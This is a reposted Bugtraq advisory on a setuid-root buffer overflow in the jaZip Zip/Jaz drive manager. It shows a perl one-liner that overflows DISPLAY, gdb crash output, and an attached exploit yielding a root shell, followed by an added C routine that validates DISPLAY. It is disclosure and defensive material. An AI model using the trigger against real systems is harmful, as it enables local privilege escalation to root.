[ SOURCE: http://www.secureroot.com/security/advisories/9795693921.html ]

Dear Bugtraq,

jaZip is a program for managing an Iomega Zip or Jaz drive. It is often installed setuid root - and because of a buffer overflow it is possible for regular users to become root. Please excuse me if this was known. Please note that I can not guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm

[root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
[root@localhost /root]# gdb /usr/X11R6/bin/jazip
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
(gdb) r
Starting program: /usr/X11R6/bin/jazip

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

----

[teleh0r@localhost teleh0r]$ rpm -q jaZip
jaZip-0.32-2
[teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
Address: 0xbffff7ac
bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
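The crash above comes from a setuid program copying an attacker-controlled DISPLAY value into a fixed buffer. As an added defensive illustration (not the advisory's attachment and not jaZip's code), this is how a setuid helper can take DISPLAY safely: it assumes a hypothetical 255-byte limit and the usual "host:display[.screen]" syntax, refuses anything longer or malformed, and is checked against a constructed 2100-byte value like the one in the advisory.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical bound; jaZip's real buffer size is not given in the advisory. */
#define DISPLAY_MAX 255

/* Copies `value` into the caller's fixed-size buffer only if it fits and looks
 * like "host:display[.screen]". Returns 0 on success, -1 if unset, too long or
 * malformed. Never reads more than `outlen` bytes of `value`. */
int read_display(const char *value, char *out, size_t outlen)
{
    if (value == NULL || outlen == 0) return -1;
    size_t len = 0;
    while (len < outlen && value[len] != '\0') len++;
    if (len == outlen) return -1;                     /* no room for the NUL */
    const char *colon = strchr(value, ':');
    if (colon == NULL || colon[1] == '\0') return -1;
    for (const char *p = value; p < colon; p++)       /* host part */
        if (!isalnum((unsigned char)*p) && *p != '.' && *p != '-') return -1;
    for (const char *p = colon + 1; *p != '\0'; p++)  /* display[.screen] */
        if (!isdigit((unsigned char)*p) && *p != '.') return -1;
    memcpy(out, value, len + 1);
    return 0;
}

/* Returns 1 if `value` would be accepted into a DISPLAY_MAX+1 byte buffer. */
int display_ok(const char *value)
{
    char buf[DISPLAY_MAX + 1];
    return read_display(value, buf, sizeof buf) == 0;
}

/* Constructed sample mirroring the advisory's 2100-byte DISPLAY value;
 * returns 1 when the check refuses it instead of copying it. */
int rejects_oversized_display(void)
{
    char sample[2101];
    memset(sample, 'A', 2100);
    sample[2100] = '\0';
    return !display_ok(sample);
}

int main(void)
{
    char buf[DISPLAY_MAX + 1];
    if (read_display(getenv("DISPLAY"), buf, sizeof buf) != 0) return 1;
    return printf("using display %s\n", buf) < 0;
}
```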